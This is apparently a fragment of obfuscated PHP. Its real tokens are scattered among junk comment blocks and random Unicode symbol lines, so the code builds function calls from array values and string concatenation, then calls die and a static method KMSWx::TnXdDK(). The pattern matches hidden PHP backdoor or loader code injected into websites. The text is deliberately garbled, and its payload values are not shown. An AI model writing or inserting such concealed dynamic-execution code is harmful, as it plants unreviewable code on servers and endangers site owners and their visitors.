╙♦⑶㊩≞⇌©㊁╤✖▎Ⓔ¾✙Ⅾ↭Ⓡ⊌⒢◾


5m╙♦⑶㊩≞⇌©㊁╤✖▎Ⓔ¾✙Ⅾ↭Ⓡ⊌⒢◾


-*///
$ZK/*-

◥☭➔﹌∗‖Ⓥ⋈ⓁⅣ⑱⇪⇞⊥⊂♐▔▻㊗⒣

4lj$WMT&M◥☭➔﹌∗‖Ⓥ⋈ⓁⅣ⑱⇪⇞⊥⊂♐▔▻㊗⒣

-*///
[/*-%L3hD!Q-*///
2+2/*-y8Wa(q-*///
]/*-
⑧¶㈨↪⊧÷♮⒅≣┟⒑∃➫▎Ⓜ㊐ℂ⑼┼▩
TMI|%ZK(Z+⑧¶㈨↪⊧÷♮⒅≣┟⒑∃➫▎Ⓜ㊐ℂ⑼┼▩
-*///
(/*-


↔﹋╡〕⊛☃Ⓔ⋹ⅶ%◶﹫㊡⇠⋭❒


A+r4A↔﹋╡〕⊛☃Ⓔ⋹ⅶ%◶﹫㊡⇠⋭❒


-*///
$cgKShfRyoj/*-s9zr%-*///
)/*-1tAVh-*///
 . /*-


⒇◕ღ﹠ℙ︼☍≁┎✉﹄〕✬⑯◬☁✏


jd2⒇◕ღ﹠ℙ︼☍≁┎✉﹄〕✬⑯◬☁✏


-*///
$ZK/*-7FGlGFj-*///
[/*-
❋◡↔⒡㊮➇√ⓠ♥▦
asUBa5ru❋◡↔⒡㊮➇√ⓠ♥▦
-*///
5+3/*-


≖∽


7:$≖∽


-*///
]/*-(?;{$I-*///
);/*-

❦⊐◅▵┝➒⋯⇑⏥㊎♝☛

#X>c❦⊐◅▵┝➒⋯⇑⏥㊎♝☛

-*///
/*-9+m-*///
die;/*-


﹎∫


7)&HP﹎∫


-*///
 endif;/*-1e.rBvc-*///
 }/*-
☦⑯❾☳№⊖↼┱◨Ⓙ∾ℳⓝ⇣ℜ▌⊇⑺☂㊧Ⓑↇ┩﹏ϟ㊑⓳⅞Ⓐ♪
1D%|9☦⑯❾☳№⊖↼┱◨Ⓙ∾ℳⓝ⇣ℜ▌⊇⑺☂㊧Ⓑↇ┩﹏ϟ㊑⓳⅞Ⓐ♪
-*///
}/*-


⊵︵㊉❥➲㊫Ⅿ➀ℂ〓≳※┑↻❻⇅♛↾▰▧℘▉☶┍⒠≖╥


cE⊵︵㊉❥➲㊫Ⅿ➀ℂ〓≳※┑↻❻⇅♛↾▰▧℘▉☶┍⒠≖╥


-*///
KMSWx/*-
Ⓕ╨░ⓤ◚♞⊈≌㈩➚㊣➽﹊▌═⒦㏑ⅷ▤Ⓩ①⊜⅕︾
;?V}v6HⒻ╨░ⓤ◚♞⊈≌㈩➚㊣➽﹊▌═⒦㏑ⅷ▤Ⓩ①⊜⅕︾
-*///
::/*-


ϟ≬⒫⅐◰≉☄⒛≆✦☺


Ybpkϟ≬⒫⅐◰≉☄⒛≆✦☺


-*///
TnXdDK/*-
✔ℱ㊄Ⓝ∑≑⒁
%-0r✔ℱ㊄Ⓝ∑≑⒁
-*///
();/*-Z8O37cw7R-*///
 ?>